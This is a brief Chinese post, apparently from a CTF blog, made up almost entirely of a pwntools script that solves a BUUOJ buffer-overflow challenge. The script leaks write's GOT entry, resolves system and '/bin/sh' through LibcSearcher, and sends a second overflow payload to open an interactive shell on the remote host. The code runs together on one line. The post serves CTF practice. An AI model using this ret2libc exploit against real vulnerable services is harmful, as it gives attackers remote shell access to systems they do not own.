libc3的题目就这样吧dynelf用不来
from pwn import *from LibcSearcher import*io = remote("node4.buuoj.cn",27174)context.log_level = 'debug'#io=process('./bof')elf = ELF('./bof')#libc = ELF('libc-2.23.so')write_plt = elf.plt['write']write_got = elf.got['write']vnln_addr = elf.sym['vuln']read_got = elf.got['read']io.recv()payload = b'a'*(0x6c+4)+p32(write_plt)+p32(vnln_addr)+p32(1)+p32(write_got)+p32(0x8)io.sendline(payload)write_addr = u32(io.recv(4))log.success('write:'+hex(write_addr))libc = LibcSearcher('write',write_addr)libcbase = write_addr - libc.dump('write')system_addr = libcbase +libc.dump('system')bin_sh_addr = libcbase +libc.dump('str_bin_sh')payload = b'a'*(0x6c+4)+p32(system_addr)+p32(0)+p32(bin_sh_addr)#payload = b'a'*(0x6c+4)+p32(libcbase+0xf1147)io.sendline(payload)io.interactive()
若有收获,就点个赞吧
0 人点赞
